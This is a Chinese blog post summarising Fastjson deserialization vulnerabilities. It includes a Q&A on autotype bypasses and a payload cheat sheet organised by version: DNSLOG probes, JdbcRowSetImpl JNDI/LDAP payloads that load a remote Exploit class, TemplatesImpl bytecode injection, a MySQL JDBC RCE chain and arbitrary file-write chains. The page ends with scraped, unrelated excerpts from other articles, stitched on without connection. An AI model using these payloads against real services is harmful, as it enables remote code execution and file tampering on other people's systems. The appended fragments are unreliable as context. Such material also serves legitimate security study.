Fastjson 总结
0x00 前言
这一篇主要是针对已经完成的fastjson系列做一个知识点总结,一来是为了更加有条理的梳理已经存在的内容,二来是为了更好的复习和利用。
0x01 Fastjson基础知识点
1.常见问题:
问:fastjson的触发点是什么?
fastjson的触发点是parseObject
问:fastjson payload最明显的特征是什么?
@type
问:fastjson 最早的利用版本是什么
1.2.24以下的版本
问:fastjson 除了可以执行命令还可以做什么其他的事情
因为fastjson本质是执行代码,所以可以做所有代码能够实现的事情
问:fastjson 的对抗历史中,主要是在绕过和对抗什么
checkautotype
问:fastjson对抗历史中,绕过Autotype的方式有哪些
Autotype开启
- 类名L
- 类名LL
- 类名[
- JNDIConfiguration绕过(黑名单不存在)
Autotype未开启
- 1.2.48 缓存绕过
- 1.2.68 白名单绕过
问:简述一下1.2.48缓存绕过的原理
首先通过Java.lang.class 将调用的类load进map,然后进行第二次@type调用,因为map中存在的,所以直接会获取到class。
0x02 POC
1.探测
1.1 DNSLOG
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog.com"}}
{{"@type":"java.net.URL","val":"http://dnslog.com"}:"a"}
2.利用
2.1 不开启AutoType
<= 1.2.24
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:9999/Exploit", "autoCommit":true}
如果 Feature.SupportNonPublicField开启,则使用下面的payload
final String CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";ClassPool classPool = ClassPool.getDefault();CtClass ctClass = classPool.getCtClass("evil");byte[] bytes = ctClass.toBytecode();String encoded = Base64.getEncoder().encodeToString(bytes);String payload = "{\"@type\":\"" + CLASS +"\",\"_bytecodes\":[\""+encoded+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{}}";return payload;
1.2.25 < 1.2.48
{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://127.0.0.1:9999/#Exploit", "autoCommit": true}}
1.2.68
这个需要使用mysql利用工具
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "127.0.0.1", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections5_calc", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }
文件操作
{ "@type": "java.lang.AutoCloseable", "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream", "targetPath": "C:/Users/wdd/Desktop/ls/ls/1.txt", "tempPath": "C:/Users/wdd/Desktop/ls/1.txt"}
文件写入
{"stream": {"@type": "java.lang.AutoCloseable","@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream","targetPath": "C:/Users/wdd/Desktop/ls/ls/4.txt","tempPath": "a"},"writer": {"@type": "java.lang.AutoCloseable","@type": "com.esotericsoftware.kryo.io.Output","buffer": "Y2VzaGk=","outputStream": {"$ref": "$.stream"},"position": 5},"close": {"@type": "java.lang.AutoCloseable","@type": "com.sleepycat.bind.serial.SerialOutput","out": {"$ref": "$.writer"}}
}
2.2 开启AutoType
1.2.25
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:9999/a", "autoCommit":true}
1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:9999/a", "autoCommit":true}
1.2.60
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://localhost:9999/a"
}
2.3 版本 1.2.5 <= 1.2.60
0x03 Fastjson调用链
历史版本
- Java代码审计——Fastjson < 24 反序列
- Java代码审计——Fastjson1.2.25反序列化漏洞
- Java代码审计——Fastjson1.2.42反序列化漏洞
- Java代码审计——Fastjson1.2.43反序列化漏洞
-
- Java代码审计——Fastjson1.2.47反序列化漏洞
- Java代码审计——Fastjson1.2.60反序列化漏洞
1.2.68
- Java代码审计——fastjson 1.2.68 反序列化漏洞 Exception
- Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable
- Java代码审计——fastjson 1.2.68 反序列化漏洞 Mysql RCE
- Java代码审计——fastjson 1.2.68 反序列化漏洞 SafeFileOutputStream文件操作
- Java代码审计——fastjson 1.2.68 反序列化漏洞 文件写入
- Java代码审计——fastjson 1.2.68 反序列化漏洞 FileOutputStream写文件
- Java代码审计——fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件
调用链
- Java代码审计——Fastjson JdbcRowSetImpl调用链
- Java代码审计——fastjson TemplatesImpl调用链
相关文章:
Fastjson 总结
0x00 前言 这一篇主要是针对已经完成的fastjson系列做一个知识点总结,一来是为了更加有条理的梳理已经存在的内容,二来是为了更好的复习和利用。 0x01 Fastjson基础知识点 1.常见问题: 问:fastjson的触发点是什么?…...
文件路径模块os.path
文件路径模块os.path 文章目录文件路径模块os.path1.概述2.解析路径2.1.拆分路径和文件名split2.2.获取文件名称basename2.3.返回路径第一部分dirname2.4.扩展名称解析路径splitext2.5.返回公共前缀路径commonprefix3.创建路径3.1.拼接路径join3.2.获取家目录3.3.规范化路径nor…...
Kerberos简单介绍及使用
Kerberos作用 简单来说安全相关一般涉及以下方面:用户认证(Kerberos的作用)、用户授权、用户管理.。而Kerberos功能是用户认证,通俗来说解决了证明A是A 的问题。 认证过程(时序图) 核心角色/概念 KDC&…...
DOM编程-全选、全不选和反选
<!DOCTYPE html> <html> <head> <meta charset"utf-8"> <title>全选、全不选和反选</title> </head> <body bgcolor"antiquewhite"> <script type"text/jav…...
C++11可变模板参数
C11可变模板参数一、简介二、语法三、可变模版参数函数3.1、递归函数方式展开参数包3.2、逗号表达式展开参数包一、简介 C11的新特性–可变模版参数(variadic templates)是C11新增的最强大的特性之一,它对参数进行了高度泛化,它能…...
Linux多线程
目录 一、认识线程 1.1 线程概念 1.2 页表 1.3 线程的优缺点 1.3.1 优点 1.3.2 缺点 1.4 线程异常 二、进程 VS 线程 三、Linux线程控制 3.1 POSIX线程库 3.1 线程创建 3.3 线程等待 3.4 线程终止 3.4.1 return退出 3.4.2 pthread_exit() 3.4.3 pthread_cancel…...
Webpack5 环境下 Openlayers 标注(Icon) require 引入图片问题
Webpack5 环境下 Openlayers 标注(Icon) require 引入图片问题环境版本Openlayers 使用 require 问题Webpack5 正确配置构建新环境的时候,偶然发现 Openlayers 使用 require 的方式加载图片(Icon)报错,开始…...
Zookeeper安装部署
文章目录Zookeeper安装部署Zookeeper安装部署 将Zookeeper安装包解压缩, [rootlocalhost opt]# ll 总用量 14032 -rw-r--r--. 1 root root 12392394 10月 13 11:44 apache-zookeeper-3.6.0-bin.tar.gz drwxrwxr-x. 6 root root 4096 10月 18 01:44 redis-5.0.4 …...
Cow Acrobats ( 临项交换贪心 )
题目大意: N 头牛 , 每头牛有一个重量(Weight)和一个力量(Strenth) , N头牛进行排列 , 第 i 头牛的风险值为其上所有牛总重减去自身力量 , 问如何排列可以使最大风险值最小 , 求出这个最小的最大风险值&am…...
MySQL:为什么说应该优先选择普通索引,尽量避免使用唯一索引
前言 在使用MySQL的过程中,随着表数据的逐渐增多,为了更快的查询我们需要的数据,我们会在表中建立不同类型的索引。 今天我们来聊一聊,普通索引和唯一索引的使用场景, 以及为什么说推荐大家优先使用普通索引…...
Spring Cloud alibaba之Feign
JAVA项目中如何实现接口调用?HttpclientHttpclient是Apache Jakarta Common下的子项目,用来提供高效的、最新的、功能丰富的支持Http协议的客户端编程工具包,并且它支持HTTP协议最新版本和建议。HttpClient相比传统JDK自带的URL Connection&a…...
零信任-Google谷歌零信任介绍(3)
谷歌零信任的介绍? "Zero Trust" 是一种网络安全模型,旨在通过降低网络中的信任级别来防止安全威胁。在零信任模型中,不论请求来自内部网络还是外部网络,系统都将对所有请求进行详细的验证和审核。这意味着每次请求都需…...
Numpy基础——人工智能基础
文章目录一、Numpy概述1.优势2.numpy历史3.Numpy的核心:多维数组4.numpy基础4.1 ndarray数组4.2 内存中的ndarray对象一、Numpy概述 1.优势 Numpy(Nummerical Python),补充了Python语言所欠缺的数值计算能力;Numpy是其它数据分析及机器学习库的底层库&…...
电商仓储与配送云仓是什么?
仓库是整个供给链的关键局部。它们是产品暂停和触摸的点,耗费空间和时间(工时)。空间和时间反过来也是费用。经过开发数学和计算机模型来微调仓库的规划和操作,经理能够显著降低与产品分销相关的劳动力本钱,进步仓库空间应用率,并…...
【零基础入门前端系列】—HTML介绍(一)
【零基础入门前端系列】—HTML介绍(一) 一、什么是HTML HTML是用来描述网页的一种语言HTML指的是超文本标记语言:HyperText Markup LanguageHTML不是一种编程语言,而是一种超文本标记语言,标记语言是一套标记标签(ma…...
Elasticsearch索引库和文档的相关操作
前言:最近一直在复习Elasticsearch相关的知识,公司搜索相关的技术用到了这个,用公司电脑配了环境,借鉴网上的课程进行了总结。希望能够加深自己的印象以及帮助到其他的小伙伴儿们😉😉。 如果文章有什么需要…...
使用Python,Opencv检测图像,视频中的猫
使用Python,Opencv检测图像,视频中的猫🐱 这篇博客将介绍如何使用Python,OpenCV库附带的默认Haar级联检测器来检测图像中的猫。同样的技术也可以应用于视频流。这些哈尔级联由约瑟夫豪斯(Joseph Howse)训练…...
浅谈域名和服务器集约化管理的误区
一个正常的网站通常由域名、网站程序、服务器三个部分组成,网站程序由单位开发设计,而域名和服务器则需要租用购买,那么域名和服务器之间的关系是什么?如何实现域名和服务器的有效管理呢? 服务器和域名的关系 服务器…...
迪赛智慧数——柱状图(正负条形图):20212022人才求职最关注的因素
效果图从近两年职场跳槽方向看,相比此前人们对高薪大厂趋之若鹜,如今职场人更关注业务前景。根据相关数据显示,职场人求职最关注的因素中,“薪资福利”权重下降,“个人发展”权重上升,“业务前景”首次进入…...
网络安全-黑帽白帽红客与网络安全法
网络安全-黑帽白帽红客与网络安全法 本章内容较少,因为刚开端。 黑客来源于hacker 指的是信息安全里面,能够自由出入对方系统,指的是擅长IT技术的电脑高手 黑帽黑客-坏蛋,研究木马的,找漏洞的,攻击网络或者…...
Cherry Studio集成火山方舟模型实战:从接入到性能调优全解析
最近在项目中尝试将火山方舟的模型集成到 Cherry Studio 里,整个过程踩了不少坑,也总结了一些经验。今天就来和大家分享一下从接入到性能调优的完整实战过程,希望能帮到有同样需求的开发者。 1. 背景与痛点:为什么集成过程让人头疼…...
ATtiny85极简Si5351 CLK0驱动:100–150MHz单频点时钟配置
1. 项目概述G1OJS_Tiny_Si5351_CLK0 是一个专为资源极度受限的微控制器(如 ATtiny85)设计的极简型 Si5351A 时钟发生器驱动库,其核心目标是仅通过最小代码体积实现对 Si5351A 芯片 CLK0 输出引脚的精确频率配置,工作范围严格限定在…...
VMware macOS支持解锁创新解决方案
VMware macOS支持解锁创新解决方案 【免费下载链接】unlocker 项目地址: https://gitcode.com/gh_mirrors/unloc/unlocker 在虚拟化技术广泛应用的今天,VMware作为行业领先的虚拟化平台,却默认隐藏了对macOS操作系统的支持选项。这种商业策略导致…...
OpenClaw新手必看:nanobot镜像的20个实用命令合集
OpenClaw新手必看:nanobot镜像的20个实用命令合集 1. 初识nanobot镜像 第一次接触OpenClaw的nanobot镜像时,我被它的轻量化设计所吸引。这个基于vllm部署的Qwen3-4B-Instruct-2507模型镜像,不仅体积小巧,还集成了chainlit推理界…...
如何影响你的日常生活?)
从物流仓库到游戏背包:三维装箱问题(3D-BPP)如何影响你的日常生活?
从物流仓库到游戏背包:三维装箱问题如何塑造我们的数字生活 清晨打开手机里的策略游戏,你发现背包格子又不够用了——那些珍贵的装备和药水总是无法完美摆放;周末搬家时,面对满屋的家具和纸箱,你突然意识到小货车可能装…...
探索Comsol弱形式求解三维光子晶体能带
Comsol弱形式求解三维光子晶体能带。在光子学领域,三维光子晶体能带的研究至关重要。而Comsol作为一款强大的多物理场仿真软件,其弱形式求解方法为我们探索三维光子晶体能带提供了有效途径。 光子晶体与能带理论基础 光子晶体是一种具有周期性介电结构的…...
)
别再折腾网络了!实测用Docker拉取Autoware镜像的几种靠谱方法(附完整代理配置)
高效获取Autoware Docker镜像的实战指南 引言 在自动驾驶开发领域,Autoware作为开源的自动驾驶软件栈,已经成为众多研究者和工程师的首选工具。然而,对于国内开发者而言,获取Autoware的Docker镜像往往成为项目启动的第一道门槛。本…...
实战演练:基于快马ai生成kafka实现用户行为日志实时收集与分析系统
今天想和大家分享一个最近用Kafka实现的实战项目——用户行为日志实时收集与分析系统。这个系统特别适合电商、内容平台这类需要实时了解用户行为的场景,下面我就把整个搭建过程拆解开来,希望能给有类似需求的同学一些参考。 系统架构设计思路 整个系统分…...
OpenClaw技能扩展实战:用Qwen3.5-9B实现公众号Markdown自动发布
OpenClaw技能扩展实战:用Qwen3.5-9B实现公众号Markdown自动发布 1. 为什么选择OpenClaw做公众号自动化 去年我开始运营技术公众号时,每周最耗时的不是写作本身,而是排版发布这个重复性工作。直到发现OpenClaw这个开源自动化框架,…...
嵌入式INI文件解析技术实现与应用
## 1. 嵌入式INI文件解析技术实现### 1.1 INI文件格式解析需求在嵌入式系统开发中,配置文件管理是常见需求。INI文件因其结构简单、可读性强,成为轻量级配置存储的理想选择。典型的INI文件结构包含三个核心要素:1. 节(Section):用…...